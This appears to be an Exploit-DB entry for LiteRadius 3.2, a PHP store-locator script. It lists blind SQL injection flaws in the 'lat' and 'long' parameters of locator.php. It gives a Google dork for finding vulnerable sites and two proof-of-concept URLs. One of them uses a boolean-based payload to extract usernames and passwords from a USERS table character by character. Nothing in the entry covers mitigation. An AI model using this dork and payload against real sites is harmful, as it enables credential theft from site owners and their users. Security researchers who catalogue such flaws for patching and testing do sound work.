LiteRadius 3.2 - Multiple Blind SQL Injections

EDB-ID:

17528

CVE:

N/A




Platform:

PHP

Date:

2011-07-13


# Exploit Title: LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities
# Google Dork: allinurl: locator.php?long=
# Date: 7/12/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://www.escaperadius.com/er/products/literadius/lr.php
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: lat=, long=

##############################################################
PoC:

http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334'
http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80


##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew